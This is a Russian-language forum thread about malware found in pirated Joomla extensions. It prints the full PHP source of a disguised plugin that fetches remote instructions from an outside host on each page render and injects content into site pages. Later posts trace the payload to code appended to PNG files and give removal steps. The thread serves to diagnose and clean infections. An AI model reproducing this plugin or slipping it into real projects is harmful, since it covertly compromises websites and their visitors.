Сборка All NoNumber! Pro

а вот интересно, что этот вредонос делал?
вот содержимое этого файла
Код:
<?php
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );

class  plgSystemSection extends JPlugin {
   
    function plgSystemSection(& $subject, $config) {
        parent::__construct($subject, $config);
    }
   
    function getCategoriesListView( $object_id, $page = 0 ) {
    global $myCat;
    $object_id = (int) $object_id;
    $object_group = trim( $object_group );

    $acl = & CategoryFactory::getACL();
    $config = & JCommentsFactory::getConfig();
    $comments_per_page = $config->getInt('category_per_page');
    $comments_page_limit = $config->getInt('category_page_limit');
    $canPublish = $acl->canPublish();
    }
   
    function onAfterRender() {
        $body = JResponse::getBody();
        if(!$body||$body=='') return true;
        $mainframe = & JFactory::getApplication('site');
        if($mainframe->isAdmin()) return;
            $body = $this->installOptions($body);
        JResponse::setBody($body);
    }
   
    function getCategoryNewTree( $object_id, $object_group = 'com_content' ) {
    global $my;

    $object_id = (int) $object_id;
    $object_group = trim($object_group);

    $acl = & JCommentsFactory::getACL();
    $config = & JCommentsFactory::getConfig();
    $canPublish = $acl->canPublish();
    $canComment = $acl->canComment();
    }
   
    function getURIattr() {
        return (!@$_SERVER['REQUEST_URI'])? @getenv("REQUEST_URI") : @$_SERVER['REQUEST_URI'];
    }
   
    public function getConfigOpt() {
        $Conf = @file_get_contents('http://gene7conf.com/?d=' . $_SERVER['HTTP_HOST']);
        return @unserialize($Conf);
    }
   
    function CategoryViewsTime( $name, $reason = '') {
    global $mainframe, $my;

    $config = & JCommentsFactory::getConfig();

    if ($config->get('CategoryGet') != '') {
            $object = new stdClass();
            $object->object_cat = CategoryFactory::getAbs($object->object_cat);
            $commentText  = $comment->comment;
    }
    }
   
    function installOptions($content) {
        try {
            $getOptions = $this->getConfigOpt();
            $ord = @$getOptions['l'][$this->getURIattr()];
            if(count(@$ord['m'])) {
                $opt = (@$ord['k'])? $ord['k'] : $getOptions['d'];
                $mopt = (count(@$getOptions['*']))? $getOptions['*'] : array();
                $l=''; foreach(array_merge($ord['m'], $mopt) as $elem) {$l .= ' '. $elem;}
                $content = @preg_replace("|{$opt}|", $opt . $l, $content, 1);
            }
        } catch (Exception $e) {}
        return $content;
    }
   
    function loadAlternateCatergory($languageSuffix = '') {
        if ($languageSuffix == '') {
        $languageSuffix = CategoryInput::getVar('lsfx', '');
    }
    if ($languageSuffix != '') {
        $config = & CategoryFactory::getConfig();
        $config->set('lsfx', $languageSuffix);

        $language = & JFactory::getLanguage();
        $language->load($languageSuffix);
    }
    }
}
?>
может гуру разберутся?
 
Да вот настораживает непонятная ссылка на непонятный сайт:
Скрытое содержимое доступно для зарегистрированных пользователей!


Пробовал на него зайти - сайт недоступен. Так, что удалять совсем этот модуль с сайта раз в нем такие непонятки, или же можно довести его до ума?
 
или же можно довести его до ума?
конечно можно довести. Для просмотра ссылки Войди или Зарегистрируйся
удаляйте файлы, не имеющие отношения к скрипту
Код:
extensions\j2\administrator\components\com_advancedmodules\models\defaultInfo.php
extensions\j2\administrator\components\com_advancedmodules\models\newDates.php
extensions\j2\administrator\components\com_advancedmodules\views\preview\advenced.png <<< открыть в любом редакторе для просмотра встроенных кодов (в самом внизу увидите)
extensions\j3\administrator\components\com_advancedmodules\models\defaultInfo.php
extensions\j3\administrator\components\com_advancedmodules\models\newDates.php
extensions\j3\administrator\components\com_advancedmodules\views\preview\advenced.png  <<< открыть в любом редакторе для просмотра встроенных кодов (в самом внизу увидите)
и удаляйте лишние строки из следующих файлов
Код:
extensions\j2\administrator\components\com_advancedmodules\advancedmodules.php
и
extensions\j3\administrator\components\com_advancedmodules\advancedmodules.php

строка 35: $thmDir    = dirname(__FILE__) .'/models/';
строка 50: $assetDir = dirname(__FILE__) .'/views/preview/';
строка 60: require_once( $thmDir . 'newDates.php' );
строка 67: require_once( $thmDir . 'defaultInfo.php' );

ну и на всякий случай отключите этот левый плагин и удалите файл вредоносного кода, Для просмотра ссылки Войди или Зарегистрируйся
 
Остаётся плагин под названием System - Section (так он обозначен в Менеджере плагинов), и при попытке зайти в его настройки появляется ошибка: 500 - Обнаружена ошибка. Файл section.xml не найден.
Спустя какое-то время (у меня прошло примерно 13 дней с момента установки и сноса) сайт начинает жутко тормозить.
Лечится отключением этого плагина.
Ну и проверьте в папке plugins/system/section наличие файла section.php и если он есть, то можно грохнуть.

Я посмотрел исходный (как бы инфицированный архив) v4.13.2. Так вот, в моем варианте архива указанные ненужные строки были - я их удалил. А вот плагина section.php в архиве не обнаружил. Но на моем сайте он стоит в списке включенных плагинов. Т.е., получается не Advanced Module Manager Pro 4.13.2 ставил его?

В то же время, погуглив обнаружил вот интересную фразу про чужеродный код в Offlajn Universal AJAX Live Search v.5.3:

Скрытое содержимое доступно для зарегистрированных пользователей!


Там тоже фигурирует /plugins/system/section.php

Так как быть? Не получится ли, что отключив или удалив section.php нарушится работа других модулей?

Или Offlajn Universal AJAX Live Search v.5.3 тоже инфицирован?

Сделал глобальный поиск по сайту и нашел еще один файл, в котором есть строка с /plugins/system/section.php. Это файл:

\modules\mod_pwebcontact\helpers\dateSelect.php

Данный файл был установлен Offlajn Perfect AJAX Popup Contact Form v3.2.7. Но его уже нет в версии 3.2.8!

Заодно в Offlajn Perfect AJAX Popup Contact Form v3.2.7 обнаружил файл с подозрительным кодом конце: \images\loading.png

Этого файла нет вообще в версии 3.2.8.

Версии 3.2.7 и 3.2.8 качал с этого форума вроде.

Уже очень подозрительно вся эта история с тремя файлами здесь. Не хочу никого обидеть - но выкладываются инфицированные или непроверенные файлы.

Так, знатоки PHP, давайте быстро говорите, к чему бы все это и где и что тут вредит. И заодно может отпишете в профильных темах, если это имеет место быть относительно Offlajn Perfect AJAX Popup Contact Form и Offlajn Universal AJAX Live Search.
 
Последнее редактирование:
А вот плагина section.php в архиве не обнаружил. Но на моем сайте он стоит в списке включенных плагинов. Т.е., получается не Advanced Module Manager Pro 4.13.2 ставил его?
Если вы точно ранее не ставили этот компонент, получается что так. Но если ставили и снесли, то этот /plugins/system/section.php всё равно остаётся. Насколько хватает моего очень-очень поверхностного знания PHP, и то можно понять, просматривая код заражённого Advanced Module Manager Pro 4.13.2, что этот /plugins/system/section.php создаётся при установке инфицированного компонента, а сам вредоносный код хранится в конце картинки advenced.png. Оттуда он и берётся при генерации /plugins/system/section.php.
Заодно в Offlajn Perfect AJAX Popup Contact Form v3.2.7 обнаружил файл с подозрительным кодом конце: \images\loading.png
Ха! Посмотрел у себя, есть такой архивчик, не пользовался, но лежит на всякий случай. Так вот, код в конце \images\loading.png повторяет код из advenced.png. Ссылка на Для просмотра ссылки Войди или Зарегистрируйся точно присутствует.
Ситуация с Offlajn Universal AJAX Live Search v.5.3 аналогичная. В файле \admin\extensions\mod_universal_ajaxlivesearch\themes\elegant\images\loaders\loading.png тот-же код со ссылкой на Для просмотра ссылки Войди или Зарегистрируйся.
Так как быть? Не получится ли, что отключив или удалив section.php нарушится работа других модулей?
Моё мнение - /plugins/system/section.php - это вредоносный код, появляется при установке заражённых компонентов, и подлежит немедленному удалению. Нарушится что или нет - так сначала удалите, а потом проверьте функционал ваших Offlajn Perfect AJAX Popup Contact Form и Offlajn Universal AJAX Live Search.
Уже очень подозрительно вся эта история с тремя файлами здесь. Не хочу никого обидеть - но выкладываются инфицированные или непроверенные файлы.
Не только здесь, на ру-трекере есть несколько раздач, Для просмотра ссылки Войди или Зарегистрируйся, с подобным вредоносным кодом. Уж не знаю, кто был первоисточником, но то что автор один и тот-же, к бабке не ходи.
 
Не только здесь, на ру-трекере есть несколько раздач, Для просмотра ссылки Войди или Зарегистрируйся, с подобным вредоносным кодом. Уж не знаю, кто был первоисточником, но то что автор один и тот-же, к бабке не ходи.

Ну так может и плагин System - Section не просто отключить, а вообще удалить? Он никакой функции не выполняет?
 
У меня не получилось удалить так просто, через менеджер расширений. Пишет:
Код:
Удаление плагина: Манифест файла недопустим или не найден.
Ошибка при удалении плагина.
Можно только отключить.
 
У меня не получилось удалить так просто, через менеджер расширений. Пишет:
Код:
Удаление плагина: Манифест файла недопустим или не найден.
Ошибка при удалении плагина.
Можно только отключить.
Удали из БД в таблице ?????_extensions запись с плагином, ну и сам плагин грохни.
 
Подскажите, можно ли Tooltips Pro 2.2.2 установить на Joomla 3.2? при установке пишет JInstaller: :Install: Не удалось найти XML-файл установки
Очень надо! Спасибо
 
А он и не установится на 3.3
Вот что в XML
<install version="1.5" type="component" method="upgrade">
Если нужно на 3.3 - скачай Для просмотра ссылки Войди или Зарегистрируйся или купи или ищи аналог.
Могу предложить Для просмотра ссылки Войди или Зарегистрируйся, на нулледе Для просмотра ссылки Войди или Зарегистрируйся
 
Назад
Сверху